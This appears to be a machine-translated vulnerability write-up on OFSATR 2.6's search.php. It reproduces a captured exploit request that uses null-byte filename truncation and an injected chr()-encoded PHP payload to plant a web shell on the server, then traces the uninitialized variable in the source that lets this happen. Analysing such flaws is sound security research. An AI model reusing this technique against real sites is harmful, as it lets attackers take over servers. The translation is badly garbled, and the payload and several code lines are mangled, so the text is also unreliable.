A simple analysis of OFSATR 2.6 Search vulnerabilities-vulnerability research

See the Internet has similar tools, but the analysis of the article did not find, listen to Black said Hacker handbook has, unfortunately I do not have a magazine, so grab the bag and then look at the code, roughly analyzed. The loophole is ingenious and classic:

get /search.php?keyword=by%20cn911&cachefile=an85.php%2500&treadinfo=〈? Fputs (fop   en (CHR). chr (98). chr (CHR). Chr (a). Chr (a). Chr ((a)) Chr (a). Chr (). Chr (M). Chr (M). Chr. chr (116). chr (). Chr (a). Chr (a). Chr (a). Chr (a). Chr (a). chr (112); Chr. chr (112), W), Chr (CHR). (CHR). Chr (a). Chr (118). Chr (). chr (108). CHR (80). Chr (+) (a) ). chr (in). chr (CHR). chr (CHR). CHR (109). chr (MB). chr (a). Chr (a). Chr (a) Chr (a) (62)) http/1.1   accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  application/x-shockwave-flash, */*   accept-language: zh-cn   accept-encoding: gzip, deflate   user-agent: mozilla/4.0  (compatible;  MSIE 6.0; WINDOWS NT 5.1; SV1)    host: 127.0.0.1

This is the file I grabbed, and I can see three variables from the bag-grabbing file: $keyword, $cachefile, $treadinfo. Where $keyword can be any keyword; $cachefile must be a PHP file, this is our PHP shell followed by%2500 both%00 truncated characters; $treadinfo is the code that generated the Trojan, I didn't decode it, But guess is to put a word Trojan write to another php file PHP code.
PS: $treadinfo content decoded as follows:

&treadinfo=〈?fputs (FOP Well, the above is the analysis of the grab bag, let's look at the seach. PHP code, find out where the vulnerabilities are. The nth line of code is as follows: $cachefile =rawurldecode ($cachefile);

The Rawurldecode function decodes the encoded URL string and decodes the URL string for $keyword and $cachefile respectively. Rawurldecode This function is also one of the key,%00 after Rawurldecode packaging, under the 〈php5.0 can be spared gpc=on play a role in truncation.
The N+n line code is as follows

..................... $keywordarray =explode ("│", $keyword); $keycount =count ($keywordarray); if ($sch _area== "C") { Include './require/schall.php '; }elseif ($sch _area== "A") { for ($j = 0; $j $keycount; $j + +) { $keywordarray [$j].= "|"; * Search Author Exact match * * } Include './require/schpart.php '; }else{ Include './require/schpart.php '; } if (!file_exists ("userdata/cache/$cachefile. txt")) { ShowMsg ("No content you want to find 〈br〉〈br〉〈br〉〈a href= ' search.php ') continue searching 〈/a〉〈/li〉〈/ul〉"); } ...............................

Here's a call to schall.php or schpart.php file, and the last line of code we're looking at in this two-file schall.php and schpart.php file is:
if ($treadinfo)
Writeover ("./userdata/cache/$cachefile. txt", $treadinfo, "AB");
So no matter which file you call can write Treadinfo content to the cached file, because the variable $treadinfo not initialized, you can customize the shell code, and $cachefile can customize a PHP file, followed by the%00 truncated txt. So this line of code is the Trojan written to the php file.
To this vulnerability generated by the approximate process has been more clear because I look at the Internet café Code, also did not specifically test. Some of these details are not indicated, please point out if there are any errors. Also very admire the flaw discovers the Saiy observation. Really a very classic loophole:)